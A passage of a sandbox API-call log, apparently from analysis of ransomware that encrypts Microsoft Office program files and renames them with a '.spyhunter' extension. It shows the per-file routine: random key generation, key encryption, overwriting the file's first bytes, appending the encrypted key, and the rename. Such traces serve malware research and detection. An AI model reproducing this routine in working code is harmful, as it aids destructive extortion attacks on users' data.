(HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0111.429] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROJIMPT.EXE.spyhunter") returned 69 [0111.429] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROJIMPT.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\projimpt.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROJIMPT.EXE.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\projimpt.exe.spyhunter")) returned 1 [0111.430] GetProcessHeap () returned 0x2c0000 [0111.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0111.430] GetProcessHeap () returned 0x2c0000 [0111.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0111.430] GetProcessHeap () returned 0x2c0000 [0111.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa900 | out: hHeap=0x2c0000) returned 1 [0111.430] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb18 | out: pbBuffer=0x248fb18) returned 1 [0111.430] GetProcessHeap () returned 0x2c0000 [0111.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0111.430] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb10*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb10*=0x30) returned 1 [0111.430] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PRTF9.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\prtf9.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0111.431] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PRTF9.DLL") returned 56 [0111.431] StrStrW (lpFirst="PRTF9.DLL", lpSrch=".txt") returned 0x0 [0111.432] GetProcessHeap () returned 0x2c0000 [0111.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0111.432] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fad4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fad4*=0x2800, lpOverlapped=0x0) returned 1 [0111.481] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.481] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fad4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fad4*=0x2800, lpOverlapped=0x0) returned 1 [0111.481] GetProcessHeap () returned 0x2c0000 [0111.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0111.481] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.482] WriteFile (in: hFile=0xb4, lpBuffer=0x248fb14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fad4, lpOverlapped=0x0 | out: lpBuffer=0x248fb14*, lpNumberOfBytesWritten=0x248fad4*=0x4, lpOverlapped=0x0) returned 1 [0111.483] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fad4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fad4*=0x30, lpOverlapped=0x0) returned 1 [0111.483] CloseHandle (hObject=0xb4) returned 1 [0111.501] GetProcessHeap () returned 0x2c0000 [0111.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0111.502] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PRTF9.DLL.spyhunter") returned 66 [0111.502] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PRTF9.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\prtf9.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PRTF9.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\prtf9.dll.spyhunter")) returned 1 [0111.503] GetProcessHeap () returned 0x2c0000 [0111.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0111.503] GetProcessHeap () returned 0x2c0000 [0111.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0111.503] GetProcessHeap () returned 0x2c0000 [0111.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfac00 | out: hHeap=0x2c0000) returned 1 [0111.504] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb10 | out: pbBuffer=0x248fb10) returned 1 [0111.504] GetProcessHeap () returned 0x2c0000 [0111.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0111.505] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb08*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb08*=0x30) returned 1 [0111.505] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSTH7FR.LEX" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\msth7fr.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0111.512] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSTH7FR.LEX") returned 64 [0111.512] StrStrW (lpFirst="MSTH7FR.LEX", lpSrch=".txt") returned 0x0 [0111.512] GetProcessHeap () returned 0x2c0000 [0111.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0111.512] ReadFile (in: hFile=0x154, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248facc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248facc*=0x2800, lpOverlapped=0x0) returned 1 [0111.515] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.516] WriteFile (in: hFile=0x154, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248facc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248facc*=0x2800, lpOverlapped=0x0) returned 1 [0111.516] GetProcessHeap () returned 0x2c0000 [0111.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0111.516] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.516] WriteFile (in: hFile=0x154, lpBuffer=0x248fb0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248facc, lpOverlapped=0x0 | out: lpBuffer=0x248fb0c*, lpNumberOfBytesWritten=0x248facc*=0x4, lpOverlapped=0x0) returned 1 [0111.569] WriteFile (in: hFile=0x154, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248facc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248facc*=0x30, lpOverlapped=0x0) returned 1 [0111.569] CloseHandle (hObject=0x154) returned 1 [0111.570] GetProcessHeap () returned 0x2c0000 [0111.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0111.570] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSTH7FR.LEX.spyhunter") returned 74 [0111.570] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSTH7FR.LEX" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\msth7fr.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSTH7FR.LEX.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\msth7fr.lex.spyhunter")) returned 1 [0111.570] GetProcessHeap () returned 0x2c0000 [0111.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0111.571] GetProcessHeap () returned 0x2c0000 [0111.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0111.571] GetProcessHeap () returned 0x2c0000 [0111.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce3730 | out: hHeap=0x2c0000) returned 1 [0111.571] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb08 | out: pbBuffer=0x248fb08) returned 1 [0111.571] GetProcessHeap () returned 0x2c0000 [0111.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0111.571] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb00*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb00*=0x30) returned 1 [0111.571] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCINFO.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgcinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0111.654] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCINFO.XML") returned 65 [0111.654] StrStrW (lpFirst="DGCINFO.XML", lpSrch=".txt") returned 0x0 [0111.654] GetProcessHeap () returned 0x2c0000 [0111.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0111.654] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fac4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248fac4*=0x49e, lpOverlapped=0x0) returned 1 [0111.655] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffb62, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.655] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x49e, lpNumberOfBytesWritten=0x248fac4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248fac4*=0x49e, lpOverlapped=0x0) returned 1 [0111.656] GetProcessHeap () returned 0x2c0000 [0111.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0111.656] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.656] WriteFile (in: hFile=0xb4, lpBuffer=0x248fb04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fac4, lpOverlapped=0x0 | out: lpBuffer=0x248fb04*, lpNumberOfBytesWritten=0x248fac4*=0x4, lpOverlapped=0x0) returned 1 [0111.656] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fac4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fac4*=0x30, lpOverlapped=0x0) returned 1 [0111.656] CloseHandle (hObject=0xb4) returned 1 [0111.656] GetProcessHeap () returned 0x2c0000 [0111.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0111.656] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCINFO.XML.spyhunter") returned 75 [0111.656] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCINFO.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgcinfo.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCINFO.XML.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgcinfo.xml.spyhunter")) returned 1 [0111.657] GetProcessHeap () returned 0x2c0000 [0111.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0111.657] GetProcessHeap () returned 0x2c0000 [0111.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0111.657] GetProcessHeap () returned 0x2c0000 [0111.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce6990 | out: hHeap=0x2c0000) returned 1 [0111.657] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb08 | out: pbBuffer=0x248fb08) returned 1 [0111.658] GetProcessHeap () returned 0x2c0000 [0111.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0111.658] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb00*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb00*=0x30) returned 1 [0111.658] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBBTN.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebbtn.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0111.667] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBBTN.DPV") returned 66 [0111.667] StrStrW (lpFirst="DGWEBBTN.DPV", lpSrch=".txt") returned 0x0 [0111.667] GetProcessHeap () returned 0x2c0000 [0111.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0111.667] ReadFile (in: hFile=0x15c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fac4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248fac4*=0x2800, lpOverlapped=0x0) returned 1 [0111.700] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.700] WriteFile (in: hFile=0x15c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fac4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248fac4*=0x2800, lpOverlapped=0x0) returned 1 [0111.700] GetProcessHeap () returned 0x2c0000 [0111.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0111.700] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.700] WriteFile (in: hFile=0x15c, lpBuffer=0x248fb04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fac4, lpOverlapped=0x0 | out: lpBuffer=0x248fb04*, lpNumberOfBytesWritten=0x248fac4*=0x4, lpOverlapped=0x0) returned 1 [0111.700] WriteFile (in: hFile=0x15c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fac4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fac4*=0x30, lpOverlapped=0x0) returned 1 [0111.700] CloseHandle (hObject=0x15c) returned 1 [0111.701] GetProcessHeap () returned 0x2c0000 [0111.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0111.701] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBBTN.DPV.spyhunter") returned 76 [0111.701] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBBTN.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebbtn.dpv"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBBTN.DPV.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebbtn.dpv.spyhunter")) returned 1 [0111.869] GetProcessHeap () returned 0x2c0000 [0111.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0111.869] GetProcessHeap () returned 0x2c0000 [0111.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0111.869] GetProcessHeap () returned 0x2c0000 [0111.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce8120 | out: hHeap=0x2c0000) returned 1 [0111.869] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb00 | out: pbBuffer=0x248fb00) returned 1 [0111.869] GetProcessHeap () returned 0x2c0000 [0111.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0111.869] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248faf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248faf8*=0x30) returned 1 [0111.869] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\SAVWBRAS.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\savwbras.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0112.246] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\SAVWBRAS.DLL") returned 59 [0112.246] StrStrW (lpFirst="SAVWBRAS.DLL", lpSrch=".txt") returned 0x0 [0112.246] GetProcessHeap () returned 0x2c0000 [0112.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0112.246] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fabc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248fabc*=0x2800, lpOverlapped=0x0) returned 1 [0112.310] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.310] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fabc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248fabc*=0x2800, lpOverlapped=0x0) returned 1 [0112.311] GetProcessHeap () returned 0x2c0000 [0112.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0112.311] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.311] WriteFile (in: hFile=0x16c, lpBuffer=0x248fafc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fabc, lpOverlapped=0x0 | out: lpBuffer=0x248fafc*, lpNumberOfBytesWritten=0x248fabc*=0x4, lpOverlapped=0x0) returned 1 [0112.321] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fabc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fabc*=0x30, lpOverlapped=0x0) returned 1 [0112.321] CloseHandle (hObject=0x16c) returned 1 [0112.321] GetProcessHeap () returned 0x2c0000 [0112.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0112.322] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\SAVWBRAS.DLL.spyhunter") returned 69 [0112.322] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\SAVWBRAS.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\savwbras.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\SAVWBRAS.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\savwbras.dll.spyhunter")) returned 1 [0112.322] GetProcessHeap () returned 0x2c0000 [0112.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0112.322] GetProcessHeap () returned 0x2c0000 [0112.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0112.322] GetProcessHeap () returned 0x2c0000 [0112.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfb080 | out: hHeap=0x2c0000) returned 1 [0112.335] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248faf8 | out: pbBuffer=0x248faf8) returned 1 [0112.335] GetProcessHeap () returned 0x2c0000 [0112.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0112.336] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248faf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248faf0*=0x30) returned 1 [0112.336] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\SEAMARBL.JPG" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\seamarbl.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0112.338] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\SEAMARBL.JPG") returned 66 [0112.338] StrStrW (lpFirst="SEAMARBL.JPG", lpSrch=".txt") returned 0x0 [0112.338] GetProcessHeap () returned 0x2c0000 [0112.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0112.338] ReadFile (in: hFile=0x15c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fab4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fab4*=0x1889, lpOverlapped=0x0) returned 1 [0112.406] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffe777, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.406] WriteFile (in: hFile=0x15c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1889, lpNumberOfBytesWritten=0x248fab4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fab4*=0x1889, lpOverlapped=0x0) returned 1 [0112.406] GetProcessHeap () returned 0x2c0000 [0112.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0112.406] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.406] WriteFile (in: hFile=0x15c, lpBuffer=0x248faf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fab4, lpOverlapped=0x0 | out: lpBuffer=0x248faf4*, lpNumberOfBytesWritten=0x248fab4*=0x4, lpOverlapped=0x0) returned 1 [0112.406] WriteFile (in: hFile=0x15c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fab4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fab4*=0x30, lpOverlapped=0x0) returned 1 [0112.406] CloseHandle (hObject=0x15c) returned 1 [0112.406] GetProcessHeap () returned 0x2c0000 [0112.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0112.407] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\SEAMARBL.JPG.spyhunter") returned 76 [0112.407] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\SEAMARBL.JPG" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\seamarbl.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\SEAMARBL.JPG.spyhunter" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\seamarbl.jpg.spyhunter")) returned 1 [0112.407] GetProcessHeap () returned 0x2c0000 [0112.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0112.408] GetProcessHeap () returned 0x2c0000 [0112.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0112.408] GetProcessHeap () returned 0x2c0000 [0112.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d022d0 | out: hHeap=0x2c0000) returned 1 [0112.408] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248faf0 | out: pbBuffer=0x248faf0) returned 1 [0112.408] GetProcessHeap () returned 0x2c0000 [0112.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0112.408] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fae8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fae8*=0x30) returned 1 [0112.408] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\JUDGESCH.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\judgesch.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0112.415] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\JUDGESCH.HTM") returned 66 [0112.415] StrStrW (lpFirst="JUDGESCH.HTM", 